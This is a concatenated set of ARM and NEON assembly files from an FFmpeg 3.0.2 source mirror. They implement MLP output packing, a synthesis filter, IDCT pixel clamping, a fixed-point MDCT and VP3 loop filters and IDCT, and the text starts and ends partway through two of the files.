DAT0 .req v1
DAT1 .req v2
DAT2 .req v3
DAT3 .req v4
DAT4 .req v5
DAT5 .req v6
DAT6 .req sl // use these rather than the otherwise unused
DAT7 .req fp // ip and lr so that we can load them usinf LDRD
.macro output4words tail, head, r0, r1, r2, r3, r4, r5, r6, r7, pointer_dead=0
.if \head
.set SIZE_GROUP1, IDX1
.if SIZE_GROUP1 > 4
.set SIZE_GROUP1, 4
.endif
.set SIZE_GROUP2, 4 - SIZE_GROUP1
load_group1 SIZE_GROUP1, \channels, \r0, \r1, \r2, \r3, \pointer_dead
.endif
.if \tail
eor CHECK, CHECK, \r4, lsr #8 - (\channels - IDX2)
eor CHECK, CHECK, \r5, lsr #7 - (\channels - IDX2)
decr_modulo IDX2, 2, \channels
.endif
.if \head
load_group2 SIZE_GROUP2, \channels, \r0, \r1, \r2, \r3, \pointer_dead
.endif
.if \tail
eor CHECK, CHECK, \r6, lsr #8 - (\channels - IDX2)
eor CHECK, CHECK, \r7, lsr #7 - (\channels - IDX2)
decr_modulo IDX2, 2, \channels
stm OUT!, {\r4, \r5, \r6, \r7}
.endif
.if \head
lsl \r0, #8 + \shift
lsl \r1, #8 + \shift
lsl \r2, #8 + \shift
lsl \r3, #8 + \shift
.endif
.endm
.set WORDS_PER_LOOP, \channels // calculate LCM (channels, 8)
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.set WORDS_PER_LOOP, WORDS_PER_LOOP * 8
.set SAMPLES_PER_LOOP, WORDS_PER_LOOP / \channels
function ff_mlp_pack_output_inorder_\channels\()ch_\shift\()shift_armv6, export=1
.if SAMPLES_PER_LOOP > 1
tst COUNT, #SAMPLES_PER_LOOP - 1 // always seems to be in practice
it ne
bne X(ff_mlp_pack_output) // but just in case, branch to C implementation if not
.endif
subs COUNT, COUNT, #SAMPLES_PER_LOOP
it lo
bxlo lr
push {v1-v6,sl,fp,lr}
.set IDX1, \channels
.set IDX2, \channels
output4words 0, 1, DAT0, DAT1, DAT2, DAT3, DAT4, DAT5, DAT6, DAT7
0: beq 1f
.rept WORDS_PER_LOOP / 8
output4words 1, 1, DAT4, DAT5, DAT6, DAT7, DAT0, DAT1, DAT2, DAT3
output4words 1, 1, DAT0, DAT1, DAT2, DAT3, DAT4, DAT5, DAT6, DAT7
.endr
subs COUNT, COUNT, #SAMPLES_PER_LOOP
bne 0b
1:
.rept WORDS_PER_LOOP / 8 - 1
output4words 1, 1, DAT4, DAT5, DAT6, DAT7, DAT0, DAT1, DAT2, DAT3
output4words 1, 1, DAT0, DAT1, DAT2, DAT3, DAT4, DAT5, DAT6, DAT7
.endr
output4words 1, 1, DAT4, DAT5, DAT6, DAT7, DAT0, DAT1, DAT2, DAT3, pointer_dead=1
output4words 1, 0, DAT0, DAT1, DAT2, DAT3, DAT4, DAT5, DAT6, DAT7
pop {v1-v6,sl,fp,pc}
endfunc
.purgem output4words
.unreq CHECK
.unreq COUNT
.unreq IN
.unreq OUT
.unreq DAT0
.unreq DAT1
.unreq DAT2
.unreq DAT3
.unreq DAT4
.unreq DAT5
.unreq DAT6
.unreq DAT7
.endif // mixed
.else // not inorder
.ifc \shift, mixed
// This case not currently handled
.else // not mixed
#if !CONFIG_THUMB
CHECK .req a1
COUNT .req a2
IN .req a3
OUT .req a4
DAT0 .req v1
DAT1 .req v2
DAT2 .req v3
DAT3 .req v4
CHAN0 .req v5
CHAN1 .req v6
CHAN2 .req sl
CHAN3 .req fp
CHAN4 .req ip
CHAN5 .req lr
.macro output4words
.if \channels == 8
.if IDX1 == 8
uxtb CHAN0, CHAN4, ror #0
uxtb CHAN1, CHAN4, ror #8
uxtb CHAN2, CHAN4, ror #16
uxtb CHAN3, CHAN4, ror #24
.else
uxtb CHAN0, CHAN5, ror #0
uxtb CHAN1, CHAN5, ror #8
uxtb CHAN2, CHAN5, ror #16
uxtb CHAN3, CHAN5, ror #24
.endif
ldr DAT0, [IN, CHAN0, lsl #2]
ldr DAT1, [IN, CHAN1, lsl #2]
ldr DAT2, [IN, CHAN2, lsl #2]
ldr DAT3, [IN, CHAN3, lsl #2]
.if IDX1 == 4
add IN, IN, #8*4
.endif
decr_modulo IDX1, 4, \channels
.else
.set SIZE_GROUP1, IDX1
.if SIZE_GROUP1 > 4
.set SIZE_GROUP1, 4
.endif
.set SIZE_GROUP2, 4 - SIZE_GROUP1
.if SIZE_GROUP1 == 2
loadregoffsh2 DAT, 0, IN, CHAN, 0 + (\channels - IDX1)
loadregoffsh2 DAT, 1, IN, CHAN, 1 + (\channels - IDX1)
add IN, IN, #8*4
.else // SIZE_GROUP1 == 4
loadregoffsh2 DAT, 0, IN, CHAN, 0 + (\channels - IDX1)
loadregoffsh2 DAT, 1, IN, CHAN, 1 + (\channels - IDX1)
loadregoffsh2 DAT, 2, IN, CHAN, 2 + (\channels - IDX1)
loadregoffsh2 DAT, 3, IN, CHAN, 3 + (\channels - IDX1)
.if IDX1 == 4
add IN, IN, #8*4
.endif
.endif
decr_modulo IDX1, SIZE_GROUP1, \channels
.if SIZE_GROUP2 == 2
loadregoffsh2 DAT, 2, IN, CHAN, 0 + (\channels - IDX1)
loadregoffsh2 DAT, 3, IN, CHAN, 1 + (\channels - IDX1)
.if IDX1 == 2
add IN, IN, #8*4
.endif
.endif
decr_modulo IDX1, SIZE_GROUP2, \channels
.endif
.if \channels == 8 // in this case we can corrupt CHAN0-3
rsb CHAN0, CHAN0, #8
rsb CHAN1, CHAN1, #8
rsb CHAN2, CHAN2, #8
rsb CHAN3, CHAN3, #8
lsl DAT0, #8 + \shift
lsl DAT1, #8 + \shift
lsl DAT2, #8 + \shift
lsl DAT3, #8 + \shift
eor CHECK, CHECK, DAT0, lsr CHAN0
eor CHECK, CHECK, DAT1, lsr CHAN1
eor CHECK, CHECK, DAT2, lsr CHAN2
eor CHECK, CHECK, DAT3, lsr CHAN3
.else
.if \shift != 0
lsl DAT0, #\shift
lsl DAT1, #\shift
lsl DAT2, #\shift
lsl DAT3, #\shift
.endif
bic DAT0, DAT0, #0xff000000
bic DAT1, DAT1, #0xff000000
bic DAT2, DAT2, #0xff000000
bic DAT3, DAT3, #0xff000000
eorlslreg CHECK, DAT0, CHAN, 0 + (\channels - IDX2)
eorlslreg CHECK, DAT1, CHAN, 1 + (\channels - IDX2)
decr_modulo IDX2, 2, \channels
eorlslreg CHECK, DAT2, CHAN, 0 + (\channels - IDX2)
eorlslreg CHECK, DAT3, CHAN, 1 + (\channels - IDX2)
decr_modulo IDX2, 2, \channels
lsl DAT0, #8
lsl DAT1, #8
lsl DAT2, #8
lsl DAT3, #8
.endif
stm OUT!, {DAT0 - DAT3}
.endm
.set WORDS_PER_LOOP, \channels // calculate LCM (channels, 4)
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.set WORDS_PER_LOOP, WORDS_PER_LOOP * 4
.set SAMPLES_PER_LOOP, WORDS_PER_LOOP / \channels
function ff_mlp_pack_output_outoforder_\channels\()ch_\shift\()shift_armv6, export=1
.if SAMPLES_PER_LOOP > 1
tst COUNT, #SAMPLES_PER_LOOP - 1 // always seems to be in practice
it ne
bne X(ff_mlp_pack_output) // but just in case, branch to C implementation if not
.endif
teq COUNT, #0
it eq
bxeq lr
push {v1-v6,sl,fp,lr}
ldr CHAN0, [sp, #(9+0)*4] // get ch_assign from stack
ldr CHAN4, [CHAN0]
.if \channels == 2
uxtb CHAN0, CHAN4, ror #0
uxtb CHAN1, CHAN4, ror #8
.else
ldr CHAN5, [CHAN0, #4]
.if \channels == 6
uxtb CHAN0, CHAN4, ror #0
uxtb CHAN1, CHAN4, ror #8
uxtb CHAN2, CHAN4, ror #16
uxtb CHAN3, CHAN4, ror #24
uxtb CHAN4, CHAN5, ror #0
uxtb CHAN5, CHAN5, ror #8
.endif
.endif
.set IDX1, \channels
.set IDX2, \channels
0:
.rept WORDS_PER_LOOP / 4
output4words
.endr
subs COUNT, COUNT, #SAMPLES_PER_LOOP
bne 0b
pop {v1-v6,sl,fp,pc}
.ltorg
endfunc
.purgem output4words
.unreq CHECK
.unreq COUNT
.unreq IN
.unreq OUT
.unreq DAT0
.unreq DAT1
.unreq DAT2
.unreq DAT3
.unreq CHAN0
.unreq CHAN1
.unreq CHAN2
.unreq CHAN3
.unreq CHAN4
.unreq CHAN5
#endif // !CONFIG_THUMB
.endif // mixed
.endif // inorder
.endm // implement_pack
.macro pack_channels inorder, channels
implement_pack \inorder, \channels, 0
implement_pack \inorder, \channels, 1
implement_pack \inorder, \channels, 2
implement_pack \inorder, \channels, 3
implement_pack \inorder, \channels, 4
implement_pack \inorder, \channels, 5
implement_pack \inorder, \channels, mixed
.endm
.macro pack_order inorder
pack_channels \inorder, 2
pack_channels \inorder, 6
pack_channels \inorder, 8
.endm
pack_order 0
pack_order 1
|
Akagi201/ffmpeg-xcode
| 4,287
|
ffmpeg-3.0.2/libavcodec/arm/synth_filter_neon.S
|
/*
* Copyright (c) 2010 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
function ff_synth_filter_float_neon, export=1
push {r3-r11,lr}
ldr r4, [r2] @ synth_buf_offset
add r1, r1, r4, lsl #2 @ synth_buf
sub r12, r4, #32
bfc r12, #9, #23
bic r4, r4, #63
str r12, [r2]
ldr r2, [sp, #12*4] @ in
mov r9, r1 @ synth_buf
VFP vpush {d0}
bl X(ff_imdct_half_neon)
VFP vpop {d0}
pop {r3}
ldr r5, [sp, #9*4] @ window
ldr r2, [sp, #10*4] @ out
NOVFP vldr s0, [sp, #12*4] @ scale
add r8, r9, #12*4
mov lr, #64*4
mov r1, #4
1:
add r10, r9, #16*4 @ synth_buf
add r11, r8, #16*4
add r0, r5, #16*4 @ window
add r6, r5, #32*4
add r7, r5, #48*4
vld1.32 {q10}, [r3,:128] @ a
add r3, r3, #16*4
vld1.32 {q1}, [r3,:128] @ b
vmov.f32 q2, #0.0 @ c
vmov.f32 q3, #0.0 @ d
mov r12, #512
2:
vld1.32 {q9}, [r8, :128], lr
vrev64.32 q9, q9
vld1.32 {q8}, [r5, :128], lr
vmls.f32 d20, d16, d19
vld1.32 {q11}, [r0, :128], lr
vmls.f32 d21, d17, d18
vld1.32 {q12}, [r9, :128], lr
vmla.f32 d2, d22, d24
vld1.32 {q8}, [r6, :128], lr
vmla.f32 d3, d23, d25
vld1.32 {q9}, [r10,:128], lr
vmla.f32 d4, d16, d18
vld1.32 {q12}, [r11,:128], lr
vmla.f32 d5, d17, d19
vrev64.32 q12, q12
vld1.32 {q11}, [r7, :128], lr
vmla.f32 d6, d22, d25
vmla.f32 d7, d23, d24
subs r12, r12, #64
beq 3f
cmp r12, r4
bne 2b
sub r8, r8, #512*4
sub r9, r9, #512*4
sub r10, r10, #512*4
sub r11, r11, #512*4
b 2b
3:
vmul.f32 q8, q10, d0[0]
vmul.f32 q9, q1, d0[0]
vst1.32 {q3}, [r3,:128]
sub r3, r3, #16*4
vst1.32 {q2}, [r3,:128]
vst1.32 {q8}, [r2,:128]
add r2, r2, #16*4
vst1.32 {q9}, [r2,:128]
subs r1, r1, #1
it eq
popeq {r4-r11,pc}
cmp r4, #0
itt eq
subeq r8, r8, #512*4
subeq r9, r9, #512*4
sub r5, r5, #512*4
sub r2, r2, #12*4 @ out
add r3, r3, #4*4 @ synth_buf2
add r5, r5, #4*4 @ window
add r9, r9, #4*4 @ synth_buf
sub r8, r8, #4*4 @ synth_buf
b 1b
endfunc
|
Akagi201/ffmpeg-xcode
| 4,428
|
ffmpeg-3.0.2/libavcodec/arm/idctdsp_arm.S
|
@
@ ARMv4-optimized IDCT functions
@ Copyright (c) 2004 AGAWA Koji <i (AT) atty (DOT) jp>
@
@ This file is part of FFmpeg.
@
@ FFmpeg is free software; you can redistribute it and/or
@ modify it under the terms of the GNU Lesser General Public
@ License as published by the Free Software Foundation; either
@ version 2.1 of the License, or (at your option) any later version.
@
@ FFmpeg is distributed in the hope that it will be useful,
@ but WITHOUT ANY WARRANTY; without even the implied warranty of
@ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
@ Lesser General Public License for more details.
@
@ You should have received a copy of the GNU Lesser General Public
@ License along with FFmpeg; if not, write to the Free Software
@ Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
@
#include "config.h"
#include "libavutil/arm/asm.S"
@ void ff_add_pixels_clamped_arm(int16_t *block, uint8_t *dest, ptrdiff_t stride)
function ff_add_pixels_clamped_arm, export=1, align=5
push {r4-r10}
mov r10, #8
1:
ldr r4, [r1] /* load dest */
/* block[0] and block[1]*/
ldrsh r5, [r0]
ldrsh r7, [r0, #2]
and r6, r4, #0xFF
and r8, r4, #0xFF00
add r6, r6, r5
add r8, r7, r8, lsr #8
mvn r5, r5
mvn r7, r7
tst r6, #0x100
it ne
movne r6, r5, lsr #24
tst r8, #0x100
it ne
movne r8, r7, lsr #24
mov r9, r6
ldrsh r5, [r0, #4] /* moved form [A] */
orr r9, r9, r8, lsl #8
/* block[2] and block[3] */
/* [A] */
ldrsh r7, [r0, #6]
and r6, r4, #0xFF0000
and r8, r4, #0xFF000000
add r6, r5, r6, lsr #16
add r8, r7, r8, lsr #24
mvn r5, r5
mvn r7, r7
tst r6, #0x100
it ne
movne r6, r5, lsr #24
tst r8, #0x100
it ne
movne r8, r7, lsr #24
orr r9, r9, r6, lsl #16
ldr r4, [r1, #4] /* moved form [B] */
orr r9, r9, r8, lsl #24
/* store dest */
ldrsh r5, [r0, #8] /* moved form [C] */
str r9, [r1]
/* load dest */
/* [B] */
/* block[4] and block[5] */
/* [C] */
ldrsh r7, [r0, #10]
and r6, r4, #0xFF
and r8, r4, #0xFF00
add r6, r6, r5
add r8, r7, r8, lsr #8
mvn r5, r5
mvn r7, r7
tst r6, #0x100
it ne
movne r6, r5, lsr #24
tst r8, #0x100
it ne
movne r8, r7, lsr #24
mov r9, r6
ldrsh r5, [r0, #12] /* moved from [D] */
orr r9, r9, r8, lsl #8
/* block[6] and block[7] */
/* [D] */
ldrsh r7, [r0, #14]
and r6, r4, #0xFF0000
and r8, r4, #0xFF000000
add r6, r5, r6, lsr #16
add r8, r7, r8, lsr #24
mvn r5, r5
mvn r7, r7
tst r6, #0x100
it ne
movne r6, r5, lsr #24
tst r8, #0x100
it ne
movne r8, r7, lsr #24
orr r9, r9, r6, lsl #16
add r0, r0, #16 /* moved from [E] */
orr r9, r9, r8, lsl #24
subs r10, r10, #1 /* moved from [F] */
/* store dest */
str r9, [r1, #4]
/* [E] */
/* [F] */
add r1, r1, r2
bne 1b
pop {r4-r10}
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 7,209
|
ffmpeg-3.0.2/libavcodec/arm/mdct_fixed_neon.S
|
/*
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
.macro prerot dst, rt
lsr r3, r6, #2 @ n4
add \rt, r4, r6, lsr #1 @ revtab + n4
add r9, r3, r3, lsl #1 @ n3
add r8, r7, r6 @ tcos + n4
add r3, r2, r6, lsr #1 @ in + n4
add r9, r2, r9, lsl #1 @ in + n3
sub r8, r8, #16
sub r10, r3, #16
sub r11, r9, #16
mov r12, #-16
1:
vld2.16 {d0,d1}, [r9, :128]!
vld2.16 {d2,d3}, [r11,:128], r12
vld2.16 {d4,d5}, [r3, :128]!
vld2.16 {d6,d7}, [r10,:128], r12
vld2.16 {d16,d17},[r7, :128]! @ cos, sin
vld2.16 {d18,d19},[r8, :128], r12
vrev64.16 q1, q1
vrev64.16 q3, q3
vrev64.16 q9, q9
vneg.s16 d0, d0
vneg.s16 d2, d2
vneg.s16 d16, d16
vneg.s16 d18, d18
vhsub.s16 d0, d0, d3 @ re
vhsub.s16 d4, d7, d4 @ im
vhsub.s16 d6, d6, d5
vhsub.s16 d2, d2, d1
vmull.s16 q10, d0, d16
vmlsl.s16 q10, d4, d17
vmull.s16 q11, d0, d17
vmlal.s16 q11, d4, d16
vmull.s16 q12, d6, d18
vmlsl.s16 q12, d2, d19
vmull.s16 q13, d6, d19
vmlal.s16 q13, d2, d18
vshrn.s32 d0, q10, #15
vshrn.s32 d1, q11, #15
vshrn.s32 d2, q12, #15
vshrn.s32 d3, q13, #15
vzip.16 d0, d1
vzip.16 d2, d3
ldrh lr, [r4], #2
ldrh r2, [\rt, #-2]!
add lr, \dst, lr, lsl #2
add r2, \dst, r2, lsl #2
vst1.32 {d0[0]}, [lr,:32]
vst1.32 {d2[0]}, [r2,:32]
ldrh lr, [r4], #2
ldrh r2, [\rt, #-2]!
add lr, \dst, lr, lsl #2
add r2, \dst, r2, lsl #2
vst1.32 {d0[1]}, [lr,:32]
vst1.32 {d2[1]}, [r2,:32]
ldrh lr, [r4], #2
ldrh r2, [\rt, #-2]!
add lr, \dst, lr, lsl #2
add r2, \dst, r2, lsl #2
vst1.32 {d1[0]}, [lr,:32]
vst1.32 {d3[0]}, [r2,:32]
ldrh lr, [r4], #2
ldrh r2, [\rt, #-2]!
add lr, \dst, lr, lsl #2
add r2, \dst, r2, lsl #2
vst1.32 {d1[1]}, [lr,:32]
vst1.32 {d3[1]}, [r2,:32]
subs r6, r6, #32
bgt 1b
.endm
function ff_mdct_fixed_calc_neon, export=1
push {r1,r4-r11,lr}
ldr r4, [r0, #8] @ revtab
ldr r6, [r0, #16] @ mdct_size; n
ldr r7, [r0, #24] @ tcos
prerot r1, r5
mov r4, r0
bl X(ff_fft_fixed_calc_neon)
pop {r5}
mov r12, #-16
ldr r6, [r4, #16] @ mdct_size; n
ldr r7, [r4, #24] @ tcos
add r5, r5, r6, lsr #1
add r7, r7, r6, lsr #1
sub r1, r5, #16
sub r2, r7, #16
1:
vld2.16 {d4,d5}, [r7,:128]!
vld2.16 {d6,d7}, [r2,:128], r12
vld2.16 {d0,d1}, [r5,:128]
vld2.16 {d2,d3}, [r1,:128]
vrev64.16 q3, q3
vrev64.16 q1, q1
vneg.s16 q3, q3
vneg.s16 q2, q2
vmull.s16 q11, d2, d6
vmlal.s16 q11, d3, d7
vmull.s16 q8, d0, d5
vmlsl.s16 q8, d1, d4
vmull.s16 q9, d0, d4
vmlal.s16 q9, d1, d5
vmull.s16 q10, d2, d7
vmlsl.s16 q10, d3, d6
vshrn.s32 d0, q11, #15
vshrn.s32 d1, q8, #15
vshrn.s32 d2, q9, #15
vshrn.s32 d3, q10, #15
vrev64.16 q0, q0
vst2.16 {d2,d3}, [r5,:128]!
vst2.16 {d0,d1}, [r1,:128], r12
subs r6, r6, #32
bgt 1b
pop {r4-r11,pc}
endfunc
function ff_mdct_fixed_calcw_neon, export=1
push {r1,r4-r11,lr}
ldrd r4, r5, [r0, #8] @ revtab, tmp_buf
ldr r6, [r0, #16] @ mdct_size; n
ldr r7, [r0, #24] @ tcos
prerot r5, r1
mov r4, r0
mov r1, r5
bl X(ff_fft_fixed_calc_neon)
pop {r7}
mov r12, #-16
ldr r6, [r4, #16] @ mdct_size; n
ldr r9, [r4, #24] @ tcos
add r5, r5, r6, lsr #1
add r7, r7, r6
add r9, r9, r6, lsr #1
sub r3, r5, #16
sub r1, r7, #16
sub r2, r9, #16
1:
vld2.16 {d4,d5}, [r9,:128]!
vld2.16 {d6,d7}, [r2,:128], r12
vld2.16 {d0,d1}, [r5,:128]!
vld2.16 {d2,d3}, [r3,:128], r12
vrev64.16 q3, q3
vrev64.16 q1, q1
vneg.s16 q3, q3
vneg.s16 q2, q2
vmull.s16 q8, d2, d6
vmlal.s16 q8, d3, d7
vmull.s16 q9, d0, d5
vmlsl.s16 q9, d1, d4
vmull.s16 q10, d0, d4
vmlal.s16 q10, d1, d5
vmull.s16 q11, d2, d7
vmlsl.s16 q11, d3, d6
vrev64.32 q8, q8
vrev64.32 q9, q9
vst2.32 {q10,q11},[r7,:128]!
vst2.32 {d16,d18},[r1,:128], r12
vst2.32 {d17,d19},[r1,:128], r12
subs r6, r6, #32
bgt 1b
pop {r4-r11,pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 13,571
|
ffmpeg-3.0.2/libavcodec/arm/vp3dsp_neon.S
|
/*
* Copyright (c) 2009 David Conrad
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
const vp3_idct_constants, align=4
.short 64277, 60547, 54491, 46341, 36410, 25080, 12785
endconst
#define xC1S7 d0[0]
#define xC2S6 d0[1]
#define xC3S5 d0[2]
#define xC4S4 d0[3]
#define xC5S3 d1[0]
#define xC6S2 d1[1]
#define xC7S1 d1[2]
.macro vp3_loop_filter
vsubl.u8 q3, d18, d17
vsubl.u8 q2, d16, d19
vadd.i16 q1, q3, q3
vadd.i16 q2, q2, q3
vadd.i16 q0, q1, q2
vrshr.s16 q0, q0, #3
vmovl.u8 q9, d18
vdup.u16 q15, r2
vabs.s16 q1, q0
vshr.s16 q0, q0, #15
vqsub.u16 q2, q15, q1
vqsub.u16 q3, q2, q1
vsub.i16 q1, q2, q3
veor q1, q1, q0
vsub.i16 q0, q1, q0
vaddw.u8 q2, q0, d17
vsub.i16 q3, q9, q0
vqmovun.s16 d0, q2
vqmovun.s16 d1, q3
.endm
function ff_vp3_v_loop_filter_neon, export=1
sub ip, r0, r1
sub r0, r0, r1, lsl #1
vld1.64 {d16}, [r0,:64], r1
vld1.64 {d17}, [r0,:64], r1
vld1.64 {d18}, [r0,:64], r1
vld1.64 {d19}, [r0,:64], r1
ldrb r2, [r2, #129*4]
vp3_loop_filter
vst1.64 {d0}, [ip,:64], r1
vst1.64 {d1}, [ip,:64], r1
bx lr
endfunc
function ff_vp3_h_loop_filter_neon, export=1
sub ip, r0, #1
sub r0, r0, #2
vld1.32 {d16[]}, [r0], r1
vld1.32 {d17[]}, [r0], r1
vld1.32 {d18[]}, [r0], r1
vld1.32 {d19[]}, [r0], r1
vld1.32 {d16[1]}, [r0], r1
vld1.32 {d17[1]}, [r0], r1
vld1.32 {d18[1]}, [r0], r1
vld1.32 {d19[1]}, [r0], r1
ldrb r2, [r2, #129*4]
vtrn.8 d16, d17
vtrn.8 d18, d19
vtrn.16 d16, d18
vtrn.16 d17, d19
vp3_loop_filter
vtrn.8 d0, d1
vst1.16 {d0[0]}, [ip], r1
vst1.16 {d1[0]}, [ip], r1
vst1.16 {d0[1]}, [ip], r1
vst1.16 {d1[1]}, [ip], r1
vst1.16 {d0[2]}, [ip], r1
vst1.16 {d1[2]}, [ip], r1
vst1.16 {d0[3]}, [ip], r1
vst1.16 {d1[3]}, [ip], r1
bx lr
endfunc
function vp3_idct_start_neon
vpush {d8-d15}
vmov.i16 q4, #0
vmov.i16 q5, #0
movrel r3, vp3_idct_constants
vld1.64 {d0-d1}, [r3,:128]
vld1.64 {d16-d19}, [r2,:128]
vst1.64 {q4-q5}, [r2,:128]!
vld1.64 {d20-d23}, [r2,:128]
vst1.64 {q4-q5}, [r2,:128]!
vld1.64 {d24-d27}, [r2,:128]
vst1.64 {q4-q5}, [r2,:128]!
vadd.s16 q1, q8, q12
vsub.s16 q8, q8, q12
vld1.64 {d28-d31}, [r2,:128]
vst1.64 {q4-q5}, [r2,:128]!
vp3_idct_core_neon:
vmull.s16 q2, d18, xC1S7 // (ip[1] * C1) << 16
vmull.s16 q3, d19, xC1S7
vmull.s16 q4, d2, xC4S4 // ((ip[0] + ip[4]) * C4) << 16
vmull.s16 q5, d3, xC4S4
vmull.s16 q6, d16, xC4S4 // ((ip[0] - ip[4]) * C4) << 16
vmull.s16 q7, d17, xC4S4
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16
vshrn.s32 d9, q7, #16
vadd.s16 q12, q1, q3 // E = (ip[0] + ip[4]) * C4
vadd.s16 q8, q8, q4 // F = (ip[0] - ip[4]) * C4
vadd.s16 q1, q2, q9 // ip[1] * C1
vmull.s16 q2, d30, xC1S7 // (ip[7] * C1) << 16
vmull.s16 q3, d31, xC1S7
vmull.s16 q4, d30, xC7S1 // (ip[7] * C7) << 16
vmull.s16 q5, d31, xC7S1
vmull.s16 q6, d18, xC7S1 // (ip[1] * C7) << 16
vmull.s16 q7, d19, xC7S1
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16 // ip[7] * C7
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16 // ip[1] * C7
vshrn.s32 d9, q7, #16
vadd.s16 q2, q2, q15 // ip[7] * C1
vadd.s16 q9, q1, q3 // A = ip[1] * C1 + ip[7] * C7
vsub.s16 q15, q4, q2 // B = ip[1] * C7 - ip[7] * C1
vmull.s16 q2, d22, xC5S3 // (ip[3] * C5) << 16
vmull.s16 q3, d23, xC5S3
vmull.s16 q4, d22, xC3S5 // (ip[3] * C3) << 16
vmull.s16 q5, d23, xC3S5
vmull.s16 q6, d26, xC5S3 // (ip[5] * C5) << 16
vmull.s16 q7, d27, xC5S3
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16
vshrn.s32 d9, q7, #16
vadd.s16 q3, q3, q11 // ip[3] * C3
vadd.s16 q4, q4, q13 // ip[5] * C5
vadd.s16 q1, q2, q11 // ip[3] * C5
vadd.s16 q11, q3, q4 // C = ip[3] * C3 + ip[5] * C5
vmull.s16 q2, d26, xC3S5 // (ip[5] * C3) << 16
vmull.s16 q3, d27, xC3S5
vmull.s16 q4, d20, xC2S6 // (ip[2] * C2) << 16
vmull.s16 q5, d21, xC2S6
vmull.s16 q6, d28, xC6S2 // (ip[6] * C6) << 16
vmull.s16 q7, d29, xC6S2
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16 // ip[6] * C6
vshrn.s32 d9, q7, #16
vadd.s16 q2, q2, q13 // ip[5] * C3
vadd.s16 q3, q3, q10 // ip[2] * C2
vsub.s16 q13, q2, q1 // D = ip[5] * C3 - ip[3] * C5
vsub.s16 q1, q9, q11 // (A - C)
vadd.s16 q11, q9, q11 // Cd = A + C
vsub.s16 q9, q15, q13 // (B - D)
vadd.s16 q13, q15, q13 // Dd = B + D
vadd.s16 q15, q3, q4 // G = ip[2] * C2 + ip[6] * C6
vmull.s16 q2, d2, xC4S4 // ((A - C) * C4) << 16
vmull.s16 q3, d3, xC4S4
vmull.s16 q4, d28, xC2S6 // (ip[6] * C2) << 16
vmull.s16 q5, d29, xC2S6
vmull.s16 q6, d20, xC6S2 // (ip[2] * C6) << 16
vmull.s16 q7, d21, xC6S2
vshrn.s32 d4, q2, #16
vshrn.s32 d5, q3, #16
vshrn.s32 d6, q4, #16
vshrn.s32 d7, q5, #16
vshrn.s32 d8, q6, #16 // ip[2] * C6
vmull.s16 q5, d18, xC4S4 // ((B - D) * C4) << 16
vmull.s16 q6, d19, xC4S4
vshrn.s32 d9, q7, #16
vadd.s16 q3, q3, q14 // ip[6] * C2
vadd.s16 q10, q1, q2 // Ad = (A - C) * C4
vsub.s16 q14, q4, q3 // H = ip[2] * C6 - ip[6] * C2
bx lr
endfunc
.macro VP3_IDCT_END type
function vp3_idct_end_\type\()_neon
.ifc \type, col
vdup.16 q0, r3
vadd.s16 q12, q12, q0
vadd.s16 q8, q8, q0
.endif
vshrn.s32 d2, q5, #16
vshrn.s32 d3, q6, #16
vadd.s16 q2, q12, q15 // Gd = E + G
vadd.s16 q9, q1, q9 // (B - D) * C4
